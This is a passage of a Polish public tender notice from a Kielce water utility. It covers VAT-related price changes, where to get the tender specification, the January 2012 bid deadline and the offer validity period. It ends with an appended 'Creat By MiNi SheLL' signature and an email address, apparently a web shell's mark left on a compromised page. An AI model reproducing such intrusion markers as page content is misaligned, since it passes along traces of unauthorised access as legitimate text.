-  w przypadku ustawowej  zmiany stawki podatku VAT od towarów i usług; strony dopuszczają zmianę wynagrodzenia o kwotę wynikającą ze zmiany podatku VAT, naliczonego od wartości netto niezrealizowanej części przedmiotu umowy, z przyczyn niezawinionych przez Wykonawcę w dacie zmiany stawki podatku,

- zwiększenia zakresu świadczenia usługi, w przypadku rozbudowy istniejących systemów ochrony.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.wod-kiel.com.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wodociągi Kieleckie Sp. z o.o. , 25-701 Kielce, ul. Krakowska 64.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.01.2012 godzina 12:45, miejsce: Wodociągi Kieleckie Sp. z o.o., 25-701 Kielce,  ul. Krakowska 64, Biuro Obsługi Klienta.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com